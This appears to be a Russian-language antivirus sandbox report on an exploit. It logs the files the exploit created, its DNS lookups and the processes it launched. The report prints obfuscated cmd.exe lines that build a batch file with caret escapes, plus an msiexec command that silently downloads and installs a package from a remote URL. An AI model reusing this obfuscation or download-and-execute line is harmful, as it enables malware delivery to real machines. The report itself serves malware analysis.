Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c EChO|SE^t /p=" M^siexe">%temp%\alpaca.bat&EcHo|s^et /p="c " >>%temp%\alpaca.bat&EcHo|s^et /p="^/i" >>%temp%\alpaca.bat&EcHo|s^et /p=" http^:^/^/^www^.firstteamcareer.com/^user^.php ">>%t...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1864
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\alpaca.bat
- %TEMP%\1387379.cvr
Сетевая активность
UDP
- DNS ASK fi####eamcareer.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c EChO|SE^t /p=" M^siexe">%temp%\alpaca.bat&EcHo|s^et /p="c " >>%temp%\alpaca.bat&EcHo|s^et /p="^/i" >>%temp%\alpaca.bat&EcHo|s^et /p=" http^:^/^/^www^.firstteamcareer.com/^user^.php ">>%t...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /S /D /c" EChO"
- '<SYSTEM32>\cmd.exe' /S /D /c" SEt /p=" M^siexe" 1>%TEMP%\alpaca.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="c " 1>>%TEMP%\alpaca.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="^/i" 1>>%TEMP%\alpaca.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p=" http^:^/^/^www^.firstteamcareer.com/^user^.php " 1>>%TEMP%\alpaca.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p=" ^/q &exit" 1>>%TEMP%\alpaca.bat"
- '<SYSTEM32>\msiexec.exe' /ihttp://www.firstteamcareer.com/user.php /q
